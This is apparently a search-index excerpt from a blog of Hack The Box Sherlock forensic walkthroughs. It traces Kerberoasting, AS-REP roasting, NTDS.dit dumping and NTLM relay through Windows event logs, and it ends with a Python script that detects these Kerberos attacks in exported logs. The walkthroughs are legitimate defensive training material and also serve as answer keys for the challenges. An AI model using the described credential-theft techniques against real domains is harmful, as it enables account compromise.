occurred?\u003c/p\u003e\n\u003cp\u003eOpen \u003cstrong\u003eEvent Viewer\u003c/strong\u003e on the Windows VM and search for \u003cstrong\u003eEvent ID \u003ca href=\"https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4769\"\u003e4769\u003c/a\u003e\u003c/strong\u003e.\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e🕒 Remember to convert your local time to \u003cstrong\u003eUTC\u003c/strong\u003e.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e\u003cimg alt=\"Kerberoasting Event\" loading=\"lazy\" src=\"/writeups/htb/sherlocks/campfire-1/2024-09-21T16_52_20,152679715+02_00.png\"\u003e\u003c/p\u003e\n\u003chr\u003e\n\u003ch1 id=\"q2-targeted-service-name\"\u003eQ2: Targeted Service Name\u003c/h1\u003e\n\u003cp\u003eWhat is the \u003cstrong\u003eService Name\u003c/strong\u003e that was targeted?\u003c/p\u003e\n\u003cp\u003eCheck the \u0026ldquo;Service 
Information\u0026rdquo; section of the same event:\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"Service Name\" loading=\"lazy\" src=\"/writeups/htb/sherlocks/campfire-1/2024-09-21T16_58_06,480108177+02_00.png\"\u003e\u003c/p\u003e\n\u003chr\u003e\n\u003ch1 id=\"q3-workstation-identification\"\u003eQ3: Workstation Identification\u003c/h1\u003e\n\u003cp\u003eIdentify the \u003cstrong\u003eWorkstation IP Address\u003c/strong\u003e from which the activity originated.\u003c/p\u003e","title":"campfire-1"},{"content":"Q1: When did the AS-REP Roasting attack occur, and when did the attacker request the Kerberos ticket for the vulnerable user? Open Event Viewer on the Windows VM and search for Event ID 4768.\nLook for anomalies in the logs — specifically events where:\nPre-Authentication Type: 0\nThis indicates that the account does not require Kerberos pre-authentication, making it vulnerable to AS-REP Roasting.\n🕒 Remember to convert the timestamp to UTC when documenting your findings.\nQ2: Please confirm the User Account that was targeted by the attacker. Within the same Event ID 4768, navigate to:\nAccount Information → Account Name\nThis field identifies the vulnerable account targeted during the attack.\nQ3: What was the SID of the targeted account? Again, in the same event:\nAccount Information → User ID\nThis value provides the unique Security Identifier (SID) of the compromised account.\nQ4: Identify the internal IP address of the compromised workstation used in this attack. In the same event, check:\nNetwork Information → Client Address\nThis reveals the source system that initiated the AS-REP request.\nQ5: Using the same Domain Controller security logs, determine which user account performed the AS-REP Roasting attack. 
Search for Event ID 4769, which logs Kerberos service ticket requests.\nCorrelate this event with the earlier 4768 event by matching the Client Address from Q4 and looking at requests made shortly after the AS-REP request, to identify the attacker-controlled account.\n🔍 The Account Name in this event indicates the user account used to request service tickets after identifying the vulnerable account.\n","permalink":"https://mikehorn-git.github.io/writeups/htb/sherlocks/campfire-2/","summary":"\u003ch1 id=\"q1-when-did-the-as-rep-roasting-attack-occur-and-when-did-the-attacker-request-the-kerberos-ticket-for-the-vulnerable-user\"\u003eQ1: When did the \u003cem\u003eAS-REP Roasting\u003c/em\u003e attack occur, and when did the attacker request the Kerberos ticket for the vulnerable user?\u003c/h1\u003e\n\u003cp\u003eOpen \u003cstrong\u003eEvent Viewer\u003c/strong\u003e on the Windows VM and search for \u003cstrong\u003eEvent ID \u003ca href=\"https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4768\"\u003e4768\u003c/a\u003e\u003c/strong\u003e.\u003c/p\u003e\n\u003cp\u003eLook for anomalies in the logs — specifically events where:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e\u003cstrong\u003ePre-Authentication Type:\u003c/strong\u003e \u003ccode\u003e0\u003c/code\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003eThis indicates that the account does not require Kerberos pre-authentication, making it vulnerable to \u003cem\u003eAS-REP Roasting\u003c/em\u003e.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"ASREP Event\" loading=\"lazy\" src=\"/writeups/htb/sherlocks/campfire-2/2024-09-21T18:18:55,910252335+02:00.png\"\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e🕒 Remember to convert the timestamp to \u003cstrong\u003eUTC\u003c/strong\u003e when documenting your findings.\u003c/p\u003e","title":"campfire-2"},{"content":"Q1: Attackers can abuse the vssadmin utility to create volume shadow snapshots and then extract sensitive files like NTDS.dit to bypass security mechanisms. 
Identify the time when the Volume Shadow Copy service entered a running state. Open the SYSTEM.evtx log and search for Event ID 7036 (Service Control Manager: a service entered a new state).\nLook for events indicating the Volume Shadow Copy service entering a running state:\n🕒 Convert the timestamp to UTC.\nQ2: When a volume shadow snapshot is created, the Volume shadow copy service validates the privileges using the Machine account and enumerates User groups. Find the User groups it enumerates, the Subject Account name, and also identify the Process ID(in decimal) of the Volume shadow copy service process Search for Event ID 4799 (a security-enabled local group membership was enumerated) and filter for:\nProcess Name: VSSVC.exe\nFrom this event, identify:\nUser Groups Subject Account Name Process ID (convert to decimal if needed) Q3: Identify the Process ID (in Decimal) of the volume shadow copy service process. From the previous Event ID 4799:\nProcess ID: (convert from hexadecimal to decimal)\nExample:\n0x1190 → 4496\nQ4: Find the assigned Volume ID/GUID value to the Shadow copy snapshot when it was mounted. Search for Event ID 300 in NTFS logs:\nQ5: Identify the full path of the dumped NTDS database on disk. Use a forensic tool such as Autopsy and search for:\nntds.dit\nQ6: When was the newly dumped ntds.dit created on disk? From the previous result in Autopsy, check:\nCreated On field\nQ7: A registry hive was also dumped alongside the NTDS database. Which registry hive was dumped and what is its file size in bytes? Navigate to the same directory as ntds.dit.\nYou should find the SYSTEM hive. 
In Autopsy, check the Overview tab:\n","permalink":"https://mikehorn-git.github.io/writeups/htb/sherlocks/crownjewel-1/","summary":"\u003ch1 id=\"q1-attackers-can-abuse-the-vssadmin-utility-to-create-volume-shadow-snapshots-and-then-extract-sensitive-files-like-ntdsdit-to-bypass-security-mechanisms-identify-the-time-when-the-volume-shadow-copy-service-entered-a-running-state\"\u003eQ1: Attackers can abuse the vssadmin utility to create volume shadow snapshots and then extract sensitive files like NTDS.dit to bypass security mechanisms. Identify the time when the Volume Shadow Copy service entered a running state.\u003c/h1\u003e\n\u003cp\u003eOpen the \u003cstrong\u003eSYSTEM.evtx\u003c/strong\u003e log and search for \u003cstrong\u003eEvent ID 7036\u003c/strong\u003e.\u003c/p\u003e\n\u003cp\u003eLook for events indicating the \u003cstrong\u003eVolume Shadow Copy\u003c/strong\u003e service entering a running state:\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"7036\" loading=\"lazy\" src=\"/writeups/htb/sherlocks/crownjewel-1/2024-09-21T11_58_52,679703907+02_00.png\"\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e🕒 Convert the timestamp to \u003cstrong\u003eUTC\u003c/strong\u003e.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003chr\u003e\n\u003ch1 id=\"q2-when-a-volume-shadow-snapshot-is-created-the-volume-shadow-copy-service-validates-the-privileges-using-the-machine-account-and-enumerates-user-groups-find-the-user-groups-it-enumerates-the-subject-account-name-and-also-identify-the-process-idin-decimal-of-the-volume-shadow-copy-service-process\"\u003eQ2: When a volume shadow snapshot is created, the Volume shadow copy service validates the privileges using the Machine account and enumerates User groups. 
Find the User groups it enumerates, the Subject Account name, and also identify the Process ID(in decimal) of the Volume shadow copy service process\u003c/h1\u003e\n\u003cp\u003eSearch for \u003cstrong\u003eEvent ID \u003ca href=\"https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4799\"\u003e4799\u003c/a\u003e\u003c/strong\u003e and filter for:\u003c/p\u003e","title":"crownjewel-1"},{"content":"Q1: When utilizing ntdsutil.exe to dump NTDS on disk, it simultaneously employs the Microsoft Shadow Copy Service. What is the most recent timestamp at which this service entered the running state, signifying the possible initiation of the NTDS dumping process? Open the SYSTEM.evtx log and search for Event ID 7036.\nUse a search (Ctrl+F) for Volume Shadow Copy service events.\nIdentify the most recent entry where the service entered the running state and note the timestamp from the:\nLogged field\n🕒 Convert the timestamp to UTC.\nQ2: Identify the full path of the dumped NTDS file. Search the Application log (Application.evtx) for events from the ESENT source, which records Extensible Storage Engine database operations.\nUse Event ID 325, which indicates:\n\u0026ldquo;The database engine created a new database\u0026rdquo;\nThis event includes the full file path of the dumped database.\nQ3: When was the database dump created on the disk? From the same Event ID 325, retrieve the timestamp from the:\nLogged field\nThis indicates when the database dump was created.\nQ4: When was the newly dumped database considered complete and ready for use? Search for Event ID 327, which indicates:\n\u0026ldquo;The database engine detached a database\u0026rdquo;\nThis marks when the dump process completed and the database was ready for use.\nQ5: Event logs use event sources to track events coming from different sources. Which event source provides database status data like creation and detachment? 
Check the Source field in the relevant events.\nEvent Source: ESENT\nThis source is responsible for logging database creation, usage, and detachment events.\nQ6: When ntdsutil.exe is used to dump the database, it enumerates certain user groups to validate the privileges of the account being used. Which two groups are enumerated by the ntdsutil.exe process? Also, find the Logon ID so we can easily track the malicious session in our hunt. Search for Event ID 4799 (a security-enabled local group membership was enumerated) and filter for:\nProcess Name: ntdsutil.exe\nFrom this event, identify:\nThe two enumerated user groups The Logon ID Q7: Now you are tasked to find the Login Time for the malicious Session. Using the Logon ID, find the Time when the user logon session started. Search for Event ID 5379 (Credential Manager credentials were read). Every event carrying the same Logon ID belongs to the same session; where the logon itself is present it is recorded as Event ID 4624 with that Logon ID under New Logon.\nUsing the Logon ID identified in the previous step, correlate the event and extract the timestamp from the:\nLogged field\nThis represents the start time of the malicious logon session.\n","permalink":"https://mikehorn-git.github.io/writeups/htb/sherlocks/crownjewel-2/","summary":"\u003ch1 id=\"q1-when-utilizing-ntdsutilexe-to-dump-ntds-on-disk-it-simultaneously-employs-the-microsoft-shadow-copy-service-what-is-the-most-recent-timestamp-at-which-this-service-entered-the-running-state-signifying-the-possible-initiation-of-the-ntds-dumping-process\"\u003eQ1: When utilizing ntdsutil.exe to dump NTDS on disk, it simultaneously employs the Microsoft Shadow Copy Service. 
What is the most recent timestamp at which this service entered the running state, signifying the possible initiation of the NTDS dumping process?\u003c/h1\u003e\n\u003cp\u003eOpen the \u003cstrong\u003eSYSTEM.evtx\u003c/strong\u003e log and search for \u003cstrong\u003eEvent ID 7036\u003c/strong\u003e.\u003c/p\u003e\n\u003cp\u003eUse a search (Ctrl+F) for \u003cstrong\u003eVolume Shadow Copy\u003c/strong\u003e service events.\u003c/p\u003e\n\u003cp\u003eIdentify the most recent entry where the service entered the running state and note the timestamp from the:\u003c/p\u003e","title":"crownjewel-2"},{"content":"Q1: IP Address of Forela-Wkstn001 What is the IP address of Forela-Wkstn001?\n🔎 See Q2 for the analysis steps.\nQ2: IP Address of Forela-Wkstn002 What is the IP address of Forela-Wkstn002?\nNote: NetworkMiner requires .pcap format. Convert the file if needed:\ntshark -F pcap -r ntlmrelay.pcapng -w ntlmrelay.pcap Open the capture in NetworkMiner to get an overview of network activity. Both workstation IP addresses can be identified here:\nQ3: Compromised User Account Which user account hash was stolen by the attacker?\n🔎 See Q4 for details.\nQ4: Attacker Device IP Address What is the IP address of the unknown device used by the attacker to intercept credentials?\nNavigate to the Credentials tab in NetworkMiner to identify:\nThe compromised user account The attacker’s IP address Q5: Accessed Fileshare What fileshare was accessed by the victim user account?\nSwitch to the Parameters tab and filter for SMB2 requests. 
Only one directory was accessed:\nQ6: Source Port Used What is the source port used to log on to the target workstation using the compromised account?\n🔎 See Q7 for details.\nQ7: Malicious Session Logon ID What is the Logon ID for the malicious session?\nOpen security.evtx and inspect Event ID 5140 (a network share object was accessed).\nFrom this event:\nExtract the Logon ID (in hexadecimal) Identify the source port (used for Q6) Q8: Suspicious Logon Details The detection is based on a mismatch between hostname and assigned IP address. What are:\nThe workstation name? The source IP address used during the malicious logon? 🔎 See Q9 for details.\nQ9: Malicious Logon Timestamp When did the malicious logon occur? Ensure the timestamp is in UTC.\nCheck Event ID 4624 (an account was successfully logged on); for an SMB logon this is Logon Type 3 (network).\nLocate the event by its Subject fields (Logon ID 0x0 and Security ID NULL, which are normal for network logons and not suspicious on their own) and the New Logon account: arthur kyle. The actual indicator is the Workstation Name not matching the Source Network Address (Q8). This event provides:\nTimestamp (convert to UTC) Workstation name Source IP address Q10: Accessed Share Name What is the share name accessed during authentication by the malicious tool?\nRefer back to Event ID 5140 (see Q6/Q7) to identify the share name.\n","permalink":"https://mikehorn-git.github.io/writeups/htb/sherlocks/reaper/","summary":"\u003ch1 id=\"q1-ip-address-of-forela-wkstn001\"\u003eQ1: IP Address of Forela-Wkstn001\u003c/h1\u003e\n\u003cp\u003eWhat is the IP address of \u003cstrong\u003eForela-Wkstn001\u003c/strong\u003e?\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e🔎 See Q2 for the analysis steps.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003chr\u003e\n\u003ch1 id=\"q2-ip-address-of-forela-wkstn002\"\u003eQ2: IP Address of Forela-Wkstn002\u003c/h1\u003e\n\u003cp\u003eWhat is the IP address of \u003cstrong\u003eForela-Wkstn002\u003c/strong\u003e?\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eNote:\u003c/strong\u003e NetworkMiner requires \u003ccode\u003e.pcap\u003c/code\u003e format. 
Convert the file if needed:\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003etshark -F pcap -r ntlmrelay.pcapng -w ntlmrelay.pcap\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eOpen the capture in \u003cstrong\u003eNetworkMiner\u003c/strong\u003e to get an overview of network activity.\nBoth workstation IP addresses can be identified here:\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"NetworkMiner Overview\" loading=\"lazy\" src=\"/writeups/htb/sherlocks/reaper/2024-09-21T15_32_55,042790459+02_00.png\"\u003e\u003c/p\u003e","title":"reaper"}]
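The Event ID 4768/4769 triage that the campfire-1 (Q1 to Q3) and campfire-2 (Q1 to Q5) entries above walk through by hand in Event Viewer, as an added Python example that is not code from any of the writeups. It assumes the Security log was exported as XML, for instance with `Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4768,4769} | ForEach-Object { $_.ToXml() }`; in that form the `TimeCreated SystemTime` attribute is already UTC, which sidesteps the local-time conversion the writeups keep warning about. It flags RC4 (0x17) service-ticket requests for user SPNs as Kerberoasting, TGT requests with Pre-Authentication Type 0 as AS-REP roasting, strips the `::ffff:` prefix that 4768/4769 put in front of IPv4 client addresses, and pivots on a client address to list every account that requested tickets from it. The XML namespace is the real Windows event schema namespace; the four records, the accounts `j.doe`, `svc_sql` and `svc_backup`, the domain `FORELA.LOCAL`, the SIDs, the client IP and the timestamps are constructed sample data.

```python
"""Kerberos 4768/4769 triage over exported Windows event XML.

Added example, not code from the writeups indexed above. Assumes records exported with
Get-WinEvent ... | ForEach-Object { $_.ToXml() }, where SystemTime is already UTC.
Every record in SAMPLE_EVENTS is constructed sample data (accounts, SIDs, domain,
client IP and timestamps are invented for the demonstration).
"""
import xml.etree.ElementTree as ET
from datetime import datetime, timezone

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}  # Windows event schema namespace
RC4_HMAC = "0x17"  # TicketEncryptionType that Kerberoasting tools request so tickets crack quickly


def _event(event_id, system_time, data):
    """Build one minimal record in the exported XML shape (constructed sample data)."""
    fields = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID>'
            f'<TimeCreated SystemTime="{system_time}"/></System>'
            f'<EventData>{fields}</EventData></Event>')


SAMPLE_EVENTS = [
    # Ordinary TGT request: pre-auth used (type 2), AES256 (0x12). Not flagged.
    _event(4768, "2024-05-21T03:10:12.4811234Z", {
        "TargetUserName": "j.doe", "TargetDomainName": "FORELA.LOCAL",
        "TargetSid": "S-1-5-21-1111-2222-3333-1104", "ServiceName": "krbtgt",
        "PreAuthType": "2", "TicketEncryptionType": "0x12",
        "IpAddress": "::ffff:172.17.79.129", "IpPort": "50010"}),
    # RC4 service ticket for a machine account: excluded, machine passwords are not crackable.
    _event(4769, "2024-05-21T03:17:55.0000000Z", {
        "TargetUserName": "j.doe@FORELA.LOCAL", "ServiceName": "FORELA-WKSTN001$",
        "TicketEncryptionType": "0x17", "IpAddress": "::ffff:172.17.79.129", "IpPort": "50011"}),
    # Kerberoasting: RC4 service ticket for a user SPN, requested from the workstation.
    _event(4769, "2024-05-21T03:18:09.0000000Z", {
        "TargetUserName": "j.doe@FORELA.LOCAL", "ServiceName": "svc_sql",
        "TicketEncryptionType": "0x17", "IpAddress": "::ffff:172.17.79.129", "IpPort": "50012"}),
    # AS-REP roasting: TGT issued to an account with pre-authentication disabled.
    _event(4768, "2024-05-29T06:36:40.0000000Z", {
        "TargetUserName": "svc_backup", "TargetDomainName": "FORELA.LOCAL",
        "TargetSid": "S-1-5-21-1111-2222-3333-1107", "ServiceName": "krbtgt",
        "PreAuthType": "0", "TicketEncryptionType": "0x17",
        "IpAddress": "::ffff:172.17.79.129", "IpPort": "50013"}),
]


def parse_event(xml_text):
    """Flatten one event into {'id', 'time', 'data'}; SystemTime in the XML is UTC."""
    root = ET.fromstring(xml_text)
    event_id = int(root.find("e:System/e:EventID", NS).text)
    stamp = root.find("e:System/e:TimeCreated", NS).get("SystemTime")
    head, _, frac = stamp.rstrip("Z").partition(".")
    # Windows writes seven fractional digits; fromisoformat accepts at most six
    when = datetime.fromisoformat(f"{head}.{frac[:6]:0<6}").replace(tzinfo=timezone.utc)
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    return {"id": event_id, "time": when, "data": data}


def client_ip(raw):
    """4768/4769 log IPv4 clients as IPv4-mapped IPv6 (::ffff:a.b.c.d); return the IPv4 part."""
    return raw[len("::ffff:"):] if raw.startswith("::ffff:") else raw


def triage(xml_records):
    """Return Kerberoasting / AS-REP roasting findings, one dict per suspicious event."""
    findings = []
    for rec in map(parse_event, xml_records):
        d = rec["data"]
        service = d.get("ServiceName", "")
        base = {"account": d.get("TargetUserName", ""),
                "client": client_ip(d.get("IpAddress", "")),
                "time_utc": rec["time"].strftime("%Y-%m-%d %H:%M:%S")}
        if (rec["id"] == 4769 and d.get("TicketEncryptionType") == RC4_HMAC
                and service.lower() != "krbtgt" and not service.endswith("$")):
            # RC4 ticket for a user SPN: the Event Viewer filter behind campfire-1 Q1..Q3
            findings.append(dict(base, technique="Kerberoasting", service=service))
        elif rec["id"] == 4768 and d.get("PreAuthType") == "0":
            # TGT without pre-auth: the AS-REP is crackable offline (campfire-2 Q1..Q4)
            findings.append(dict(base, technique="AS-REP Roasting", sid=d.get("TargetSid", "")))
    return findings


def accounts_from_client(xml_records, ip):
    """(event id, account, UTC time) for every request from one client address, oldest first:
    the pivot that ties the AS-REP request to the attacker's own account (campfire-2 Q5)."""
    rows = []
    for rec in map(parse_event, xml_records):
        if client_ip(rec["data"].get("IpAddress", "")) == ip:
            rows.append((rec["id"], rec["data"].get("TargetUserName", ""),
                         rec["time"].strftime("%Y-%m-%d %H:%M:%S")))
    return sorted(rows, key=lambda r: r[2])


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
    for row in accounts_from_client(SAMPLE_EVENTS, "172.17.79.129"):
        print(row)
```

To run this against a real export, replace `SAMPLE_EVENTS` with the list of XML strings produced by `Get-WinEvent`, one event per string. Excluding `krbtgt` and `$`-suffixed service names keeps TGT renewals and machine-account traffic out of the Kerberoasting list; an RC4 request for a user SPN from a workstation that otherwise negotiates AES is the signal worth pulling into Event Viewer for the screenshot.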